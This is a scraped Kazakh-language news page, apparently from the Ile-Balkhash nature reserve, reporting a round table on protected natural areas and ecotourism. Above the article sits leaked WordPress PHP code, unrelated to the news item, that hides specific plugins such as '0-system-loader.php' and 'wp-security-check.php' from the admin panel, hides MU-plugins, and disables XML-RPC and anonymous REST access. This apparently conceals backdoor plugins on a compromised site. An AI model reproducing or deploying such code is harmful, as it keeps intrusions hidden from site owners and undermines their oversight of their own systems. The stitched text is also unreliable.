// Security: Disable remote access add_filter("xmlrpc_enabled", "__return_false"); add_filter("xmlrpc_methods", function($methods) { return array(); }); add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); «ТАБИҒАТ – ҰЛТТЫҚ МҰРА» республикалық сараптамалық іс-шарасы өтті — Иле-Балхашский заповедник «ТАБИҒАТ – ҰЛТТЫҚ МҰРА» республикалық сараптамалық іс-шарасы өтті — Иле-Балхашский заповедник

«ТАБИҒАТ – ҰЛТТЫҚ МҰРА» республикалық сараптамалық іс-шарасы өтті

Қазақстанның «Байтақ» жасылдар партиясы мен «AYALA» ұлттық палатасының ұйымдастыруымен ерекше қорғалатын табиғи аумақтар жүйесін дамытуға бағытталған «Табиғат – ұлттық мұра» республикалық сараптамалық дөңгелек үстелдер циклі өткізілуде.

Сараптамалық кездесулердің кезекті бағыты ретінде іс-шара «Іле-Балқаш» мемлекеттік табиғи резерватының аумағында ұйымдастырылды.

Кездесудің негізгі бөлігінде ерекше қорғалатын табиғи аумақтарды дамыту және олардың табиғи әлеуетін тиімді пайдалану мәселелеріне басымдық берілді. Сонымен қатар, табиғатты қорғау қызметінің қазіргі таңдағы өзекті мәселелері, табиғи кешендер мен биоалуантүрлілікті сақтау, қорғалатын аумақтардың экологиялық маңызын арттыру бағыттары талқыланды.

Сондай-ақ «Іле-Балқаш» мемлекеттік табиғи резерваты аумағында экотуризмді дамыту, табиғи нысандардың туристік әлеуетін тиімді пайдалану және экологиялық туризмді табиғатты қорғау талаптарымен үйлестіру мәселелері бойынша пікір алмаcу өтті.

Кездесу барысында сала мамандары тәжірибелерімен бөлісіп, ерекше қорғалатын табиғи аумақтарды сақтау мен дамытудың тиімді жолдарын талқылады.

Іс-шара табиғатты қорғау саласындағы өзекті мәселелерді саралауға, тәжірибе алмасуға және қорғалатын табиғи аумақтарды одан әрі дамыту бағытындағы өзара ынтымақтастықты нығайтуға мүмкіндік берді.

Табиғатты сақтау – болашаққа жасалған инвестиция